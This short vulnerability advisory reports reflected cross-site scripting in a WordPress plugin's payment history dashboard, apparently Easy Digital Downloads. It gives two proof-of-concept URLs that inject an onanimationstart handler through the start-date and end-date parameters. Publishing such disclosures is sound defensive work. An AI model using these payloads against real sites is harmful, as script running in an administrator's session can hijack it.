The plugin does not escape the start-date and end-date parameters in the payment history dashboard before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&start-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&end-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//